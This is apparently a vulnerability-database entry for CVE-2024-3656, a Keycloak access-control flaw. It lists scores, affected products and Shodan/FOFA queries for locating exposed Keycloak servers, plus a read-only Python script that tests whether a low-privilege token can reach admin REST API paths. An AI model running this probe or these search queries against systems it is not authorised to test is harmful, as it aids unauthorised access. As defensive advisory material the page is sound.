CVE-2024-3656
Severity: HIGH (Nuclei)
org.keycloak/keycloak-services < 24.0.5 - Information Disclosure
Title source: ruleDescription
A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows such users to perform actions reserved for administrators, potentially leading to data breaches or system compromise. The CVSS vector (PR:L, UI:N) reflects that the attacker needs only a valid low-privilege account on the realm and no user interaction; the network-reachable admin REST API is the attack surface.
Exploits (1)
Nuclei Templates (1)
Keycloak < 24.0.5 - Broken Access Control
Severity: HIGH, verified. Authors: iamnoooob, rootxharsh, pdresearch
Shodan:
http.favicon.hash:"-1105083093" || http.html:"keycloak" || http.title:"keycloak"
FOFA:
icon_hash=-1105083093 || body="keycloak" || title="keycloak"
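The Shodan and FOFA queries above only locate Keycloak instances; confirming the access-control flaw itself means authenticating as a deliberately non-administrative user and checking whether admin REST API paths answer with 2xx instead of 401/403. The following script is an added example written for this page; it is not the nuclei template and not Keycloak project code. The KEYCLOAK_* settings and ADMIN_PROBES list are hypothetical placeholders: this page does not name the affected endpoints, so the probe paths are ordinary Keycloak admin REST API paths that demonstrate the method, and the tester should fill the list from the fix or advisory. It issues only GET requests and is meant for instances you are authorised to test.

```python
"""Manual verification helper for the Keycloak admin REST API access-control
flaw described above (CVE-2024-3656).

Added example, not the page's or the Keycloak project's own code. Assumptions:
the KEYCLOAK_* settings and ADMIN_PROBES below are hypothetical placeholders;
the probe paths are ordinary admin REST API paths used only to show the
method, since this page does not list which endpoints are affected. The
script reads only (GET) and reports which admin paths a non-admin token can
reach.
"""
import json
import urllib.error
import urllib.parse
import urllib.request

FIXED_VERSION = (24, 0, 5)  # keycloak-services < 24.0.5 is listed as affected

# Hypothetical placeholders: point these at a test instance you own.
KEYCLOAK_BASE = "https://keycloak.example.test"
KEYCLOAK_REALM = "master"
LOW_PRIV_USER = "lowpriv"      # a user with no realm-management roles
LOW_PRIV_PASS = "changeme"
ADMIN_PROBES = [
    f"/admin/realms/{KEYCLOAK_REALM}",
    f"/admin/realms/{KEYCLOAK_REALM}/users",
    f"/admin/realms/{KEYCLOAK_REALM}/clients",
]


def parse_version(text: str) -> tuple:
    """'24.0.4' -> (24, 0, 4). Qualifiers such as '-SNAPSHOT' or
    '.redhat-00001' are dropped; missing components count as 0."""
    core = text.split("-", 1)[0]
    parts = []
    for piece in core.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected_version(version: str) -> bool:
    """True for keycloak-services artifact versions below the fixed release."""
    return parse_version(version) < FIXED_VERSION


def classify(status: int) -> str:
    """A non-admin bearer token must be rejected on admin paths: 401/403 is
    the expected answer, any 2xx is the finding this CVE describes."""
    if 200 <= status < 300:
        return "ACCESSIBLE"
    if status in (401, 403):
        return "denied"
    return f"other({status})"


def summarize(results: dict) -> bool:
    """True when at least one admin path answered 2xx to the low-privilege token."""
    return any(verdict == "ACCESSIBLE" for verdict in results.values())


def get_token(base, realm, username, password, client_id="admin-cli"):
    """Resource Owner Password grant against the realm's OIDC token endpoint.
    Needs a client with direct access grants enabled (admin-cli has them by default)."""
    url = f"{base}/realms/{realm}/protocol/openid-connect/token"
    body = urllib.parse.urlencode({
        "grant_type": "password",
        "client_id": client_id,
        "username": username,
        "password": password,
    }).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)["access_token"]


def probe(base, token, paths):
    """GET each admin path with the low-privilege token and classify the status."""
    results = {}
    for path in paths:
        req = urllib.request.Request(base + path,
                                     headers={"Authorization": f"Bearer {token}"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:
            status = err.code          # 401/403 arrive here, not as a response
        results[path] = classify(status)
    return results


if __name__ == "__main__":
    token = get_token(KEYCLOAK_BASE, KEYCLOAK_REALM, LOW_PRIV_USER, LOW_PRIV_PASS)
    found = probe(KEYCLOAK_BASE, token, ADMIN_PROBES)
    for path, verdict in found.items():
        print(f"{verdict:12} {path}")
    print("VULNERABLE" if summarize(found) else "no admin path reachable")
```

A patched server answers 401 or 403 on every admin path for this token, so any ACCESSIBLE line is the finding. If the token request itself fails with 401, direct access grants are disabled for the client; obtain the low-privilege token through a normal browser login instead. The version helper is for the supply-chain side of the check, when the keycloak-services artifact version is known from a build manifest rather than from the running server.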
References (8)
Scores
CVSS v3: 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
EPSS: 0.8966 (percentile 99.6%)
Attack Vector: NETWORK
Details
CWE: CWE-200
Status: published
Products (4)
org.keycloak/keycloak-services (Maven): 0 - 24.0.5 (fixed in 24.0.5)
Red Hat/Red Hat Build of Keycloak
Red Hat/Red Hat JBoss Enterprise Application Platform 8
Red Hat/Red Hat Single Sign-On 7
Published: Oct 09, 2024
Tracked Since: Feb 18, 2026